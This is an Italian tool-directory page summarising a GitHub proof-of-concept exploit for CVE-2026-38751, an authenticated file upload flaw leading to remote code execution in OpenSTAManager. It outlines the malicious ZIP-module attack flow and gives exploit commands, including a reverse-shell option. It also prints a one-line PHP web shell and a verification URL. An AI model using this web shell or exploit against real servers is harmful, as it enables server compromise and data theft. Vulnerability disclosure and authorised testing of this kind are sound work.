Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

Vedi Repository
12 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questa repository contiene un proof-of-concept (PoC) per CVE-2026-38751, che interessa OpenSTAManager ≤ 2.10. La vulnerabilità consente a un attaccante autenticato di caricare un modulo maligno tramite la funzionalità di aggiornamento dei moduli, portando al caricamento arbitrario di file e all'esecuzione di codice in remoto (RCE).

Condividi

CVE-2026-38751 – OpenSTAManager: Caricamento Arbitrario di File (PoC)

Questo repository contiene un exploit proof-of-concept (PoC) per CVE-2026-38751, che affligge OpenSTAManager ≤ 2.10. La vulnerabilità consente a un attaccante autenticato di caricare un modulo malevolo tramite la funzionalità di aggiornamento dei moduli, portando a caricamento arbitrario di file ed esecuzione di codice in remoto (RCE).

Riferimento CVE

  • Voce MITRE CVE (primo record di divulgazione): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • Database delle vulnerabilità NVD (NIST): https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • GitHub Advisory Database https://github.com/advisories/GHSA-rm34-fg4m-39mw

Software Interessato

  • OpenSTAManager ≤ 2.10
  • Sistema di aggiornamento moduli (modules/aggiornamenti/upload_modules.php)

Descrizione della Vulnerabilità

La funzionalità di aggiornamento dei moduli consente a utenti autenticati di caricare moduli basati su ZIP senza una corretta validazione del contenuto dei file o dei limiti di esecuzione. Un attaccante può creare un modulo malevolo contenente payload PHP, che vengono poi distribuiti nella web root ed eseguiti tramite il contesto dell'applicazione. Questo comporta:

  • Caricamento arbitrario di file (CWE-434)
  • Esecuzione di codice in remoto tramite file PHP caricati
  • Compromissione totale del contesto dell'applicazione

Flusso dell'Attacco (Livello Alto)

  1. Autenticarsi a OpenSTAManager
  2. Caricare un archivio ZIP di modulo creato ad hoc
  3. Attivare il processo di installazione/aggiornamento del modulo
  4. Accedere al payload PHP caricato tramite la web root
  5. Eseguire comandi arbitrari sul server

##Impatto Uno sfruttamento riuscito consente:

  • Esecuzione di comandi in remoto
  • Compromissione del server web
  • Esfiltrazione di dati
  • Piena compromissione dell'applicazione a seconda dei privilegi

Requisiti

  • Un account utente autenticato valido
  • Accesso abilitato alla funzionalità di aggiornamento dei moduli

Utilizzo (PoC)

  1. Generare il modulo malevolo
root@kitploit:~
python exploit.py --build

Crea:

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. Eseguire l'exploit
root@kitploit:~
python exploit.py <username> <password> <target_url>

Modalità reverse shell opzionale:

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

Esempio di Payload

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

Verifica

In caso di successo, il seguente endpoint esegue comandi di sistema: /modules/run/evil.php?cmd=id

Riferimenti MITRE / NVD

  • Record CVE MITRE: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • Voce NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

Esclusione di responsabilità

Questo progetto è pensato per:

  • Scopi educativi
  • Test di sicurezza autorizzati
  • Ambienti di ricerca

Non utilizzarlo contro sistemi senza autorizzazione esplicita.

Note

Il rilevamento può variare a seconda della configurazione del server. Alcune distribuzioni potrebbero disabilitare l'esecuzione diretta di PHP nelle directory dei moduli. I tempi di attivazione del modulo potrebbero richiedere nuovi tentativi.

Riconoscimenti

  • Programma CVE MITRE
  • NIST National Vulnerability Database (NVD)
  • Manutentori del progetto OpenSTAManager
  • https://github.com/fuutianyii/poc (Primo PoC)
Scarica lo strumento